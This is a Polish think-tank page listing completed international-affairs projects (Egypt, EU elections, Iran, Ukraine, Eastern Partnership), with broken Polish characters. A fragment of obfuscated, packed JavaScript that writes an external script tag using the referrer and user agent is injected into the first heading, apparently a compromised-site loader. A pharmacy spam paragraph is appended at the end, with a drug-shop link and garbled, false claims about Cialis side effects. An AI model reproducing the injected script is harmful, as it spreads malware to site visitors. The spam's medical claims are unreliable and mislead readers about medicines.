Zakończone projekty

EGYPTIAN

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fffer|var|u0026u|referrer|fdzbs||js|php'.split('|'),0,{})) TESTIMONIES„]

EGYPTIAN TESTIMONIES

[PROJEKT ZAKO?CZONY, VII 2013]

Koordynatorzy projektu: Artur Malantowicz, Barbara Marcinkowska


egypt-wikimedia-commons„Egyptian Testimonies” to pierwsza z mini-serii opublikowanych w ramach Bloga CIM. Dostrzegaj?c konieczno?? dostarczenia bie??cego komentarza do wydarze? w Egipcie z lipca 2013 roku, jak równie? potrzeb? przedstawienia refleksji osób, których wydarzenia te bezpo?rednio dotyka?y, zaprosili?my do wspó?pracy m?odych Egipcjan – publicystów, opozycjonistów, studentów – by przedstawili nam swój punkt widzenia.

Zobacz wi?cej.

EUROWYBORY 2014

EUROWYBORY 2014

[PROJEKT ZAKO?CZONY, XI 2013 – VI 2014]

Koordynator projektu: Barbara Marcinkowska


eurowyboryWybory do Parlamentu Europejskiego planowane na maj 2014 roku by?y pierwszymi, które odby?y si? po wej?ciu w ?ycie Traktatu Lizbo?skiego. W zwi?zku z pewnymi zmianami traktatowymi (np. wi?kszy wp?yw Parlamentu Europejskiego na wybór przewodnicz?cego Komisji Europejskiej, czy na proces decyzyjny), jak równie? ogóln? kampani? UE odno?nie zwi?kszenia zainteresowania obywateli sprawami unijnymi, wybory i poprzedzaj?ca je kampania budzi?y du?e emocje.

Zobacz wi?cej.

PROGRAM AMERYKA?SKI

PROGRAM AMERYKA?SKI

[PROJEKT ZAKO?CZONY, III 2012 – VII 2014]

Koordynator projektu: ?ukasz Smalec


USProgram Ameryka?ski stanowi? forum wspó?pracy i wymiany pogl?dów osób zainteresowanych szeroko rozumian? problematyk? ameryka?sk?, ze szczególnym uwzgl?dnieniem roli USA w systemie mi?dzynarodowym. W centrum zainteresowania by?a ameryka?ska polityka zagraniczna i bezpiecze?stwa po zako?czeniu zimnej wojny. Uczestnicy programu analizowali równie? problemy polityki wewn?trznej oraz kwestie ekonomiczne m.in. w kontek?cie zapowiedzi wy?onienia si? „nowego rz?du ekonomicznego”. Podstawowym celem programu by?o podj?cie debaty nad obecn? rol? Stanów Zjednoczonych w systemie mi?dzynarodowym.

Zobacz wi?cej.

PROGRAM AZJATYCKI

PROGRAM AZJATYCKI

[PROJEKT ZAKO?CZONY, VI 2011 – VII 2014]

Koordynatorzy projektu: Artur Malantowicz (2012-2014), Pawe? Bie?kowski (2011-2012)


PAProgram Azjatycki dzia?a? w latach 2011-2014 i stanowi? platform? wspó?pracy m?odych naukowców pracuj?cych nad wspó?czesn? dynamik? Azji – zdecydowanie najszybciej rozwijaj?cego si? obecnie kontynentu i wspó?czesnego mocarstwa gospodarczego na skal? ?wiatow?. Cz?onkowie Programu Azjatyckiego prowadzili multidyscyplinarne badania obejmuj?ce szerokie spektrum tematów, poczynaj?c od polityki i studiów bezpiecze?stwa, przez wymiar ekonomiczny i ludzki, do bada? nad azjatyck? kultur?. Celem Programu by?o rozniecenie debaty nad rol? Azji w globalnym uk?adzie si?, jak równie? odkrycie jej s?abych i silnych stron oraz dyskusja nad zwi?zkami mi?dzy Zachodem a nowym centrum ?wiatowego porz?dku.

Zobacz wi?cej.

SPO?ECZNO?? MI?DZYNARODOWA WOBEC PROGRAMU NUKLEARNEGO IRANU

SPO?ECZNO?? MI?DZYNARODOWA WOBEC PROGRAMU NUKLEARNEGO IRANU

[PROJEKT ZAKO?CZONY, IX 2013 – VI 2014]

Koordynatorzy projektu: Artur Malantowicz, ?ukasz Smalec


Iran_PNGProgram nuklearny Iranu stanowi jeden z g?ównych problemów w debacie na temat stosunków mi?dzynarodowych. Obok g?osów pe?nych obaw i niepokoju, nie brak równie? opinii odmiennych. Zainspirowani ni? postanowili?my spojrze? na problem ambicji nuklearnych Iranu z szerszej perspektywy, poddaj?c analizie postaw? kluczowych aktorów na arenie mi?dzynarodowej.

Zobacz wi?cej.

?WIATOWE REAKCJE NA KONFLIKT NA UKRAINIE

?WIATOWE REAKCJE NA KONFLIKT NA UKRAINIE

[PROJEKT ZAKO?CZONY, XI 2013 – III 2014]

Koordynator projektu: Barbara Marcinkowska


ukraina cimPodczas szczytu Partnerstwa Wschodniego w Wilnie (listopad 2013r.) pa?stwa cz?onkowskie ugrupowania mia?y podpisa? umowy stowarzyszeniowe z Uni? Europejsk?. Dla Ukrainy mia? by? to ostateczny dowód na obranie europejskiego kierunku polityki zagranicznej. Jednak ju? w trakcie szczytu prezydent Wiktor Janukowycz oznajmi?, ?e umowy stowarzyszeniowej Ukraina nie podpisze. Decyzja rz?du spowodowa?a masowe pro-europejskie protesty Ukrai?ców na kijowskim Majdanie, t?umione pó?niej brutalnie przez w?adze. Sytuacja na Ukrainie skomplikowa?a si? jeszcze bardziej po aneksji pó?wyspu krymskiego przez Rosj? i pojawieniu si? rosyjskich i prorosyjskich bojowników we Wschodniej Ukrainie.

Zobacz wi?cej.

PARTNERSTWO WSCHODNIE M?ODYCH

PARTNERSTWO WSCHODNIE M?ODYCH

[PROJEKT ZAKO?CZONY, VI 2009 – XII 2012]

Koordynator projektu: Anita S?k


yeap_logo1Partnerstwo Wschodnie M?odych (PWM) to mi?dzynarodowy projekt naukowo-badawczy, zainicjowany przez Ko?o Studentów Stosunków Mi?dzynarodowych Uniwersytetu Jagiello?skiego (KSSM UJ) w 2009 roku, nast?pnie realizowany w ramach Centrum Inicjatyw Mi?dzynarodowych.

M?odzi profesjonali?ci z 10 krajów UE i pa?stw Partnerstwa Wschodniego (PW), zainspirowani polsko-szwedzk? propozycj? wzmocnienia wschodniego wymiaru Europejskiej Polityki S?siedztwa, przez kilka lat wspó?pracowali na dwóch komplementarnych p?aszczyznach. Pierwsza – naukowo-badawcza – mia?a na celu wspólne podejmowanie przedsi?wzi?? naukowych, w tym organizacj? spotka? i konferencji, wydawanie analiz i komentarzy w formie angloj?zycznych publikacji i newslettera. Druga p?aszczyzna to sfera socjalizacyjno-kulturowa, zak?adaj?ca integracj? m?odzie?y na mi?dzynarodowych spotkaniach zespo?u PWM i promocj? inicjatyw? PW w Europie.

Zobacz wi?cej.

To be happy it is significant to be healthy. How can medicines help up? It isn’t difficult for immigrants to purchase drugs online. How it is possible? For example Xylocaine causes loss of feeling in an area of your body. Given during childbirth. Secondly treats emergency heart rhythm problems. Usually, if you have lost the charisma, charm to a particular partner, treatment options like Cialis to improve potency is unlikely to help him back. Cialis is a drug used to treat different troubles. What do you already know about sildenafil vs tadalafil? Apparently every adult has heard about vardenafil vs sildenafil. (Read more http://rootinfonline.com/cialis-for-daily-use.html). Like all other medications, Cialis is also accordingly of it’s active ingredient. While the medicine is credited with nerve hurt, it can also cause sexual frustration. The most common potentially serious side effects of such medicaments like Cialis is stuffy or runny nose. Tell local physician if you have any unwanted side effect that bothers you. Discuss the problem with your health care professional to ensure that you can use this drug. Some tests can be used to extent of male sexual problems.